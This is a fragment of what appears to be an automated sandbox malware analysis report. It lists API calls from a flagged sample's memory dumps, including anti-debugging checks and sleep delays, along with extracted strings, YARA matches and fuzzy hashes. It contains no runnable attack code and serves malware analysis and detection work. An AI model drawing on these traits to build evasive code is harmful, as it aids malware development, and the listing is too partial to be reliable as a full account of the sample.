                                                        • Sleep.KERNEL32(00000BB8,00000000,?,04936D08,0041D8D0,0042DBDC,0042DBDD), ref: 0493555C
                                                        • __Init_thread_footer.LIBCMT ref: 04935652
                                                        • Sleep.KERNEL32(000007D0), ref: 049359BC
                                                        • Sleep.KERNEL32(000007D0), ref: 049359D6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: @BAO$updateSW
                                                        • API String ID: 3554146954-956047173
                                                        • Opcode ID: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                                                        • Instruction ID: 223758c8d8510edee59c084e2d7614b844503aa8b73045fbb870119d03096c36
                                                        • Opcode Fuzzy Hash: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                                                        • Instruction Fuzzy Hash: D03222B0D002549BEB28DF24CC487AEBBB4AF8A319F1542F9D4096B291D775BE84CF45
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ?$<1w|$L8Y$_"]$vg_${{O$I/
                                                        • API String ID: 0-105129496
                                                        • Opcode ID: e60bcd6729a5440652f2fe49031106f1f1a3138604100b92a41e71322adf5b6f
                                                        • Instruction ID: f5c203cd7e1ac8c99859ea8cae17f50808564aed89d28379ddcafd5ab9191297
                                                        • Opcode Fuzzy Hash: e60bcd6729a5440652f2fe49031106f1f1a3138604100b92a41e71322adf5b6f
                                                        • Instruction Fuzzy Hash: 9FB206F360C6049FE304AE2DDC4567ABBE6EFD4720F1A893DEAC483744EA3558058697
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 2O?$@0~$Bs#$hk$t'~=$oVz$y{
                                                        • API String ID: 0-3646772216
                                                        • Opcode ID: c14260b0e80b9a98f1c506bac7ad2fbf5f3e7ec9f6a14aab3c128c4da16bc837
                                                        • Instruction ID: 402a59baacd3b5d14cdbaf7942428ebadc022fc8be9896125c4629bb264bb269
                                                        • Opcode Fuzzy Hash: c14260b0e80b9a98f1c506bac7ad2fbf5f3e7ec9f6a14aab3c128c4da16bc837
                                                        • Instruction Fuzzy Hash: D4B2F6F360C6049FE304AE2DDC8567AFBE9EF94320F16893DEAC4C7744E63558458692
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: &=[$*ay$*ay$7J[X$=vk>$?$gY|
                                                        • API String ID: 0-3324505961
                                                        • Opcode ID: 4f7ef6e8d95c37313641dfc0055530583770522e6eb463c0769f426eac2e4c6d
                                                        • Instruction ID: 90870fa8f0afe137935f9b2f1129624f565508c762b6f2fb0c06207727f052bf
                                                        • Opcode Fuzzy Hash: 4f7ef6e8d95c37313641dfc0055530583770522e6eb463c0769f426eac2e4c6d
                                                        • Instruction Fuzzy Hash: 87A208F390C2049FE304AF1DEC8567ABBE5EF94720F1A893DEAC583744EA3558058697
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __floor_pentium4
                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                        • API String ID: 4168288129-2761157908
                                                        • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                                                        • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                                                        • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                                                        • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 2ZGI$7Gy_$aHs$mlA_${s_$*[
                                                        • API String ID: 0-1933231807
                                                        • Opcode ID: d2604b886d2c402a0334e75c6b7092f0173380b9dbb375dc7a4531e7f997c7d6
                                                        • Instruction ID: 5b141fe565b41d9cc5155941860a1a94e9ff21c6bf284b05ebe95884eef43970
                                                        • Opcode Fuzzy Hash: d2604b886d2c402a0334e75c6b7092f0173380b9dbb375dc7a4531e7f997c7d6
                                                        • Instruction Fuzzy Hash: E2B228F3A0C2109FE3046E2DEC8567ABBE9EF94720F16463DEAC5D3744EA3558018796
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: &{Z$:b}{$=-D{$P3k~$bcv$q}-
                                                        • API String ID: 0-774030853
                                                        • Opcode ID: 8022afc912d2c577b2417e539565753dea90c1f0937f5fb5ddc1a6231d4f9950
                                                        • Instruction ID: 9c126adb36ba48f949a008eb422fda5099ea2b7a35a57cc1ef7221e7fe187d80
                                                        • Opcode Fuzzy Hash: 8022afc912d2c577b2417e539565753dea90c1f0937f5fb5ddc1a6231d4f9950
                                                        • Instruction Fuzzy Hash: FAB2E6F360C2009FE304AE2DEC8567ABBE9EF94320F1A493DE6C5D7744E63598058796
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #G8P$.t^R$A.O$zn$k]@
                                                        • API String ID: 0-3385205391
                                                        • Opcode ID: 326aa654a478778a0bb5119cb37d649a32e5a33c491b109219488dc977b45cef
                                                        • Instruction ID: b69dab89e5131a0fce6c66642aff16217b2cd5418e7095f6402473a496116c85
                                                        • Opcode Fuzzy Hash: 326aa654a478778a0bb5119cb37d649a32e5a33c491b109219488dc977b45cef
                                                        • Instruction Fuzzy Hash: 5EB207F3A0C2049FE3046E2DEC8567AFBE9EFD4720F16853DEAD483744EA3558058696
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: )qwi$0}u$4}u$eD$qsZ
                                                        • API String ID: 0-3029846939
                                                        • Opcode ID: d45f2e68971d7f597754ff84b0ae04cd3b857047caeef5777633c3dcdace68e7
                                                        • Instruction ID: 3dcf2e09d5aa784f3187be803553bfcd80b89d0abdd0563f5b07a390817d3938
                                                        • Opcode Fuzzy Hash: d45f2e68971d7f597754ff84b0ae04cd3b857047caeef5777633c3dcdace68e7
                                                        • Instruction Fuzzy Hash: C192F5F360C2049FE7146E29EC8577AFBE5EF94720F1A493DEAC483740EA3598058697
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #'Az$$xn$e-iz$z<}{
                                                        • API String ID: 0-3086351599
                                                        • Opcode ID: 330c46c158060b214fec02f58abae3b26c4d8bd32d0acb67d4402ecd40ac7f7c
                                                        • Instruction ID: a1f514152c7e47d2984c289cc771ed350df49066b873ec7017a912c8103c1872
                                                        • Opcode Fuzzy Hash: 330c46c158060b214fec02f58abae3b26c4d8bd32d0acb67d4402ecd40ac7f7c
                                                        • Instruction Fuzzy Hash: F9B20AF36082049FE304AE2DDC85A7AF7E9EFD4720F1A893DEAC5C7744E93558058692
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DZo~$Teo$0q|$Gg_
                                                        • API String ID: 0-402255400
                                                        • Opcode ID: 3a637b210eafc8586e493780b0dfaac0456e21abc083d41a2b3f8d8a8ada6ab9
                                                        • Instruction ID: 38a644df7e702a360e5425ab9c9b9b91bc6779cd10afa63bd077eb2d2d957cf2
                                                        • Opcode Fuzzy Hash: 3a637b210eafc8586e493780b0dfaac0456e21abc083d41a2b3f8d8a8ada6ab9
                                                        • Instruction Fuzzy Hash: DDB208F3A0C2149FE3046E2DEC8567AFBE9EF94720F16893DE6C483744EA3558058697
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "bx$gCW{$cr?$vr>
                                                        • API String ID: 0-1691296516
                                                        • Opcode ID: 232e93ff47e47f6a9074181011bf8f0ed9205fa7a1121d2ae19b63cdec948221
                                                        • Instruction ID: c5b92e4574358968840b741f2defb6856f1b815489dd6b9f34fc902804e0f107
                                                        • Opcode Fuzzy Hash: 232e93ff47e47f6a9074181011bf8f0ed9205fa7a1121d2ae19b63cdec948221
                                                        • Instruction Fuzzy Hash: 25B218F360C304AFE7146E2DEC8567ABBE9EB94720F16493DEAC4C3744EA3558008697
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                                                        • Instruction ID: fa956fdae317020ac19a581a41398d9c45e8d0b1ac734fa4acbe81453ab37588
                                                        • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                                                        • Instruction Fuzzy Hash: 86022C71E012199FDB14CFA9C984AAEBBF5FF88314F148279D919EB340D731AA45CB90
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                                                        • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                                                        • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                                                        • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                                        • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                        • String ID:
                                                        • API String ID: 254469556-0
                                                        • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                        • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                                        • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                        • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0493A7FD
                                                        • IsDebuggerPresent.KERNEL32 ref: 0493A8C9
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0493A8E9
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0493A8F3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                        • String ID:
                                                        • API String ID: 254469556-0
                                                        • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                        • Instruction ID: 62919bc36b84fda0e749d36c632da5e993357a99352e646dcfd1ad18ea196035
                                                        • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                        • Instruction Fuzzy Hash: 7731F975D0521CDBDB10DFA4D989BCCBBB8BF08305F1041AAE54DAB250EB71AA85CF45
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                                                        • IsDebuggerPresent.KERNEL32 ref: 0040A662
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                        • String ID:
                                                        • API String ID: 254469556-0
                                                        • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                        • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                                                        • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                        • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !#{w$)AM$h_W
                                                        • API String ID: 0-249211239
                                                        • Opcode ID: d1648812c497651b1ad11efcdeee7fcdb74bce63e43d90cc902e07b11760f4e3
                                                        • Instruction ID: 858fd34f3e70b1315fb4a2dd8ab238e560b73dcf87b70f432e36eaab7da6a270
                                                        • Opcode Fuzzy Hash: d1648812c497651b1ad11efcdeee7fcdb74bce63e43d90cc902e07b11760f4e3
                                                        • Instruction Fuzzy Hash: 7AB239F36082049FE304AE2DEC8567ABBE9EF94320F1A453DEAC5C7744E67598018796
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                        • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                                        • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                        • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04932AA0), ref: 0493D142
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04932AA0), ref: 0493D14C
                                                        • UnhandledExceptionFilter.KERNEL32(0493277A,?,?,?,?,?,04932AA0), ref: 0493D159
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                                        • Instruction ID: 34ded91ae66ba47a41276a88eca504d48e69a35d7258192db0b25e70c6f93b44
                                                        • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                                        • Instruction Fuzzy Hash: 6F31D8749112289BCB21DF64DC89BCCBBB8BF48315F5041EAE40CA7260E770AF858F44
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                                                        • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                                                        • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                                                        • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                        • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                        • ExitProcess.KERNEL32 ref: 10005F60
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                        • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                        • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                        • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ',?u$(k?
                                                        • API String ID: 0-1174945301
                                                        • Opcode ID: db213a3c03312dfd37426ed38a8b523f9aac1175ccbb2284e84538283718993f
                                                        • Instruction ID: fb8ba4f763cba683ff8e54f49faeae2b38a9fbe2daecfd2600dee8fbb7dba4f0
                                                        • Opcode Fuzzy Hash: db213a3c03312dfd37426ed38a8b523f9aac1175ccbb2284e84538283718993f
                                                        • Instruction Fuzzy Hash: 15B23BF360C2049FE3046E2DEC8567ABBEAEBD4320F1A493DE6C5C7744EA3558458693
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: f__$5fx
                                                        • API String ID: 0-647228677
                                                        • Opcode ID: 9bcc8528cb559305f21da779524ac1ce2c655b2544451fc8c92bc9e4277a1383
                                                        • Instruction ID: 3080e4b32440eb1c9571b9d959d74522cfc5ff48ea943ef5956d68379c4b2096
                                                        • Opcode Fuzzy Hash: 9bcc8528cb559305f21da779524ac1ce2c655b2544451fc8c92bc9e4277a1383
                                                        • Instruction Fuzzy Hash: A9B217F360C204AFE7046E29EC85A7AFBE9EF94720F16493DE6C4C3344EA7558058697
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$GetProcAddress.$l
                                                        • API String ID: 0-2784972518
                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                        • Instruction ID: 6b9b36a192e3e9ea31a7229c7929fc2729a9d8dbe7cfa250a2b719c887260d90
                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                        • Instruction Fuzzy Hash: 38316CB6900609DFEB10CF99C880AAEBBF9FF49329F14405AD541AB314D771FA45CBA4
                                                        APIs
                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,6CC08CF2), ref: 00410837
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 1518329722-0
                                                        • Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                                                        • Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
                                                        • Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                                                        • Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6H{$D`|
                                                        • API String ID: 0-1667874750
                                                        • Opcode ID: f76551f19040d895c021699d036321218e8c1d45aaef75e40e79a5d3f4913e4d
                                                        • Instruction ID: 05dba821345bb7a0699c4fe354901d8426a6c80bde952121442665c0817dab6a
                                                        • Opcode Fuzzy Hash: f76551f19040d895c021699d036321218e8c1d45aaef75e40e79a5d3f4913e4d
                                                        • Instruction Fuzzy Hash: 745123F3E146044BF3485A38DD09766B6C6DBD0320F2B863DDE8997784ED7E9D0A4286
                                                        APIs
                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaise
                                                        • String ID:
                                                        • API String ID: 3997070919-0
                                                        • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                        • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                        • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                        • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                        APIs
                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04945990,?,?,00000008,?,?,0494C8F1,00000000), ref: 04945BC2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionRaise
                                                        • String ID:
                                                        • API String ID: 3997070919-0
